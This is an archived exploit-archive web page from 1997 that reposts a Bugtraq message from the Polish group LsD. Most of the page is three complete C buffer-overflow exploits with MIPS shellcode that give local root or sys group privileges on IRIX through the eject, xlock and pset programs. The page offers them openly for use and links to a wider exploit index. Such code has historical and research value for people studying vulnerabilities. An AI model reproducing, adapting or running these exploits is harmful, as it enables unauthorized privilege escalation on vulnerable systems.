home *** CD-ROM | disk | FTP | other *** search
Text File | 1999-05-16 | 10.1 KB | 312 lines | [ TEXT/ttxt]
<HTML> <HEAD> <META name="description" content="Apparently, the "anonymous friend" who sent exploit code to Yuri may have swiped it from the polish group LsD. Anyway, they sent in 3 more exploits which are very similar (actually almost exactly the same) as those Yuri's polish friend sent."> <META name="keywords" content=" Anyway, IRIX, LsD, More, Yuri, actually, almost, anonymous, as, buffer, code, courtesy, exactly, exploit, exploits, friend, group, have, may, more, overflows, polish, presumably, same, sent, similar, swiped, they, those, up, very, which, who"> <TITLE>3 More IRIX buffer overflows, courtesy of LsD</TITLE> <BODY TEXT="#FFFFFF" LINK="#0B7CFF" VLINK="#7f7f7f" BGCOLOR="#000000"> <CENTER><H1><B>3 More IRIX buffer overflows, courtesy of LsD</B></H1></CENTER><TABLE WIDTH="100%"><TR BGCOLOR="#005f00"><TH ALIGN="CENTER"><B>Summary</B></TH></TR></TABLE> <TABLE> <TR><TD VALIGN="top"><B>Description:</B></TD><TD>Apparently, the "anonymous friend" who sent exploit code to Yuri may have swiped it from the polish group LsD. Anyway, they sent in 3 more exploits which are very similar (actually almost exactly the same) as those Yuri's polish friend sent.</TD></TR> <TR><TD VALIGN="top"><B>Author:</B></TD><TD>Sent from a hacked account by LsD, Last Stage of Delirium</TD></TR> <TR><TD VALIGN="top"><B>Compromise:</B></TD><TD><font size=+3 color=#ff0000> root </font> (local)</TD></TR> <TR><TD VALIGN="top"><B>Vulnerable Systems:</B></TD><TD>IRIX, presumably up to 6.3 </TD></TR> <TR><TD VALIGN="top"><B>Date:</B></TD><TD>25 May 1997 </TD></TR> <!-- <TR><TD VALIGN="top"><B>Notes:</B></TD><TD> </TD></TR> --> </TABLE> <TABLE WIDTH="100%"><TR BGCOLOR="#005f00"><TH ALIGN="CENTER"><B>Details</B></TH></TR></TABLE><BR> <PRE> Date: Mon, 26 May 1997 00:30:53 -0700 From: Mats Andersson <matsa@WWW.TRYCKINDUSTRI.SE> To: BUGTRAQ@NETSPACE.ORG Sun 25 May 1997, somewhere in Poland. Hi everyone! We're sending you a sample of the codes that were originally written by the polish group LsD. In general we are not eager to release our codes but after Yuri's letter we felt that something was left unmentioned. We would like to indicate that these pieces of code were written about half a year ago, just after the release of the Aleph1's article in Phrack "Smashing the stack for fun and profit". The exploits were written just for our purposes so they are not as perfectly written as they should be. But in our opinion this is not what is all about in this kind of programs. We are not posting df and ordist exploit sources because they are "amazingly" similar to the sources sent to Yuri. This is just a sample. We assure you that there are more buffer overflow exploitable programs on irix. Credits go to : - Aleph1 for his infamous article about buffer overflow technic, - David Hedley for being the first person publicly revealing the irix bo secret, - "anonymous friend" for his "cooperation", just dont know what to say you Greetings go to: - our friends from the swedish PTR group, - all polish hackers P.S. This letter was sent from the fake account.....please dont use it. --------------------------------------------------------------------------------- /* copyright by */ /* Last Stage of Delirium, Dec 1996, Poland*/ #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #define BUFSIZE 2068 #define OFFS 800 #define ADDRS 3 #define ALIGN 0 #define ALIGN2 4 char asmcode[]="\x3c\x18\x2f\x62\x37\x18\x69\x6e\x3c\x19\x2f\x73\x37\x39\x68\x2e\xaf\xb8\xff\xf8\xaf\xb9\xff\xfc\xa3\xa0\xff\xff\x27\xa4\xff\xf8\x27\xa5\xff\xf0\x01\x60\x30\x24\xaf\xa4\xff\xf0\xaf\xa0\xff\xf4\x24\x02\x04\x23\x02\x04\x8d\x0c"; char nop[]="\x24\x0f\x12\x34"; void run(unsigned char *buf) { execl("/usr/sbin/eject","lsd",buf,NULL); printf("execl failed\n"); } char jump[]="\x03\xa0\x10\x25\x03\xe0\x00\x08\x24\x0f\x12\x34\x24\x0f\x12\x34"; main(int argc, char *argv[]) { char *buf, *ptr, addr[8]; int offs=OFFS, bufsize=BUFSIZE, addrs=ADDRS, align=ALIGN; int i, noplen=strlen(nop); if (argc >1) bufsize=atoi(argv[1]); if (argc >2) offs=atoi(argv[2]); if (argc >3) addrs=atoi(argv[3]); if (argc >4) align=atoi(argv[4]); if (bufsize<strlen(asmcode)) { printf("bufsize too small, code is %d bytes long\n", strlen(asmcode)); exit(1); } if ((buf=malloc(bufsize+(ADDRS<<2)+noplen+1))==NULL) { printf("Can't malloc\n"); exit(1); } *(int *)addr=(*(unsigned long(*)())jump)()+offs; printf("address=%p\n",*(int *)addr); strcpy(buf,nop); ptr=buf+noplen; buf+=4-align; for(i=0;i<bufsize;i++) *ptr++=nop[i%noplen]; memcpy(ptr-strlen(asmcode),asmcode,strlen(asmcode)); for(i=0;i<(addrs<<2);i++) *ptr++=addr[i%sizeof(int)]; *ptr=0; printf("buflen=%d\n", strlen(buf)); fflush(stdout); ptr-=addrs<<2; *(int *)addr+=(0x7fff350c-0x7fff31e8)+(4*100)+ALIGN2; for(i=0;i<64;i++) *ptr++=addr[i&3]; /* gp value is set here */ ptr=buf+ALIGN+(0x7fff2f00-0x7fff2ce8)-24; *(int *)addr=(*(unsigned long(*)())jump)()+OFFS+(0x7fff350c-0x7fff31e8-4)+ALIGN2+32+32412; for(i=0;i<64;i++) *ptr++=addr[i&3]; run(buf); } ------------------------------------------------------------------------------------ /* copyright by */ /* Last Stage of Delirium, Dec 1996, Poland*/ #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #define BUFSIZE 2072 #define OFFS (800+512+128) #define ADDRS 0x100 #define ALIGN 2 char asmcode[]="\x3c\x18\x2f\x62\x37\x18\x69\x6e\x3c\x19\x2f\x73\x37\x39\x68\x2e\xaf\xb8\xff\xf8\xaf\xb9\xff\xfc\xa3\xa0\xff\xff\x27\xa4\xff\xf8\x27\xa5\xff\xf0\x01\x60\x30\x24\xaf\xa4\xff\xf0\xaf\xa0\xff\xf4\x24\x02\x04\x23\x02\x04\x8d\x0c"; char nop[]="\x24\x0f\x12\x34"; void run(unsigned char *buf) { execl("/usr/bin/X11/xlock","lsd","-name",buf,NULL); printf("execl failed\n"); } char jump[]="\x03\xa0\x10\x25\x03\xe0\x00\x08\x24\x0f\x12\x34\x24\x0f\x12\x34"; main(int argc, char *argv[]) { char *buf, *ptr, addr[8]; int offs=OFFS, bufsize=BUFSIZE, addrs=ADDRS, align=ALIGN; int i, noplen=strlen(nop); if (argc >1) bufsize=atoi(argv[1]); if (argc >2) offs=atoi(argv[2]); if (argc >3) addrs=atoi(argv[3]); if (argc >4) align=atoi(argv[4]); if (bufsize<strlen(asmcode)) { printf("bufsize too small, code is %d bytes long\n", strlen(asmcode)); exit(1); } if ((buf=malloc(bufsize+(ADDRS<<2)+noplen+1))==NULL) { printf("Can't malloc\n"); exit(1); } *(int *)addr=(*(unsigned long(*)())jump)()+offs; printf("address=%p\n",*(int *)addr); strcpy(buf,nop); ptr=buf+noplen; buf+=4-align; for(i=0;i<bufsize;i++) *ptr++=nop[i%noplen]; memcpy(ptr-strlen(asmcode),asmcode,strlen(asmcode)); for(i=0;i<(addrs<<2);i++) *ptr++=addr[i%sizeof(int)]; *ptr=0; printf("buflen=%d\n",strlen(buf)); fflush(stdout); /* gp value is set here */ ptr=buf+ALIGN+(0x7fff22c0-0x7fff1ea0); *(int *)addr=(*(unsigned long(*)())jump)()+OFFS+(0x7fff3828-0x7fff3468)+32476; for(i=0;i<4;i++) *ptr++=addr[i&3]; run(buf); } ------------------------------------------------------------------------------------ /* copyright by */ /* Last Stage of Delirium, Dec 1996, Poland*/ /* This one gives you egid=0(sys) */ #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #define BUFSIZE 4172 #define OFFS 816 #define ADDRS 8 #define ALIGN 3 #define ALIGN2 1 char asmcode[]="\x3c\x18\x2f\x62\x37\x18\x69\x6e\x3c\x19\x2f\x73\x37\x39\x68\x2e\xaf\xb8\xff\xf8\xaf\xb9\xff\xfc\xa3\xa0\xff\xff\x27\xa4\xff\xf8\x27\xa5\xff\xf0\x01\x60\x30\x24\xaf\xa4\xff\xf0\xaf\xa0\xff\xf4\x24\x02\x04\x23\x02\x04\x8d\x0c"; /* char nop[]="\x24\x0f\x12\x34"; */ char nop[]="\x01\x20\x48\x25"; void run(unsigned char *buf) { execl("/sbin/pset","lsd","-s","666",buf,NULL); printf("execl failed\n"); } char jump[]="\x03\xa0\x10\x25\x03\xe0\x00\x08\x24\x0f\x12\x34\x24\x0f\x12\x34"; /* unsigned long get_sp(void) { __asm__("or $2,$sp,$0"); } */ main(int argc, char *argv[]) { char *buf, *ptr, addr[8]; int offs=OFFS, bufsize=BUFSIZE, addrs=ADDRS, align=ALIGN; int i, noplen=strlen(nop); if (argc >1) bufsize=atoi(argv[1]); if (argc >2) offs=atoi(argv[2]); if (argc >3) addrs=atoi(argv[3]); if (argc >4) align=atoi(argv[4]); if (bufsize<strlen(asmcode)) { printf("bufsize too small, code is %d bytes long\n", strlen(asmcode)); exit(1); } if ((buf=malloc(bufsize+(ADDRS<<2)+noplen+1))==NULL) { printf("Can't malloc\n"); exit(1); } *(int *)addr=(*(unsigned long(*)())jump)()+offs; printf("address=%p\n", *(int *)addr); strcpy(buf,nop); ptr=buf+noplen; buf+=align; for(i=0;i<bufsize;i++) *ptr++=nop[i%noplen]; memcpy(ptr-strlen(asmcode),asmcode,strlen(asmcode)); for(i=0;i<ALIGN2;i++) *ptr++=nop[i%noplen]; for(i=0;i<(addrs<<2);i++) *ptr++=addr[i%sizeof(int)]; *ptr=0; printf("buflen=%d\n", strlen(buf)); fflush(stdout); run(buf); } </PRE> <PRE> </PRE> <TABLE WIDTH="100%"><TR BGCOLOR="#005f00"><TH ALIGN="CENTER"><B>More Exploits!</B></TH></TR></TABLE><BR> The master index of all exploits is available <A HREF="../sploits_all.html">here</A> (Very large file)<BR> Or you can pick your favorite operating system:<BR> <TABLE BORDER=1> <TR> <TD><A HREF="../sploits_all.html">All OS's</A></TD> <TD><A HREF="../sploits_linux.html">Linux</A></TD> <TD><A HREF="../sploits_solaris.html">Solaris/SunOS</A></TD> <TD><A HREF="../sploits_microshit.html">Micro$oft</A></TD> </TR><TR> <TD><A HREF="../sploits_bsd.html">*BSD</A></TD> <TD><A HREF="../sploits_mac.html">Macintosh</A></TD> <TD><A HREF="../sploits_aix.html">AIX</A></TD> <TD><A HREF="../sploits_irix.html">IRIX</A></TD> </TR><TR> <TD><A HREF="../sploits_ultrix.html">ULTRIX/Digital UNIX</A></TD> <TD><A HREF="../sploits_hpux.html">HP/UX</A></TD> <TD><A HREF="../sploits_sco.html">SCO</A></TD> <TD><A HREF="../sploits_remote.html">Remote exploits</A></TD> </TR></TABLE> <BR> This page is part of <A HREF="../sploits.html"> Fyodor's exploit world</A>. Please do not <A HREF="../notes/steal.html"> steal</A> it. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, <A HREF="../nmap/index.html">nmap</A>. </BODY> </HTML> 
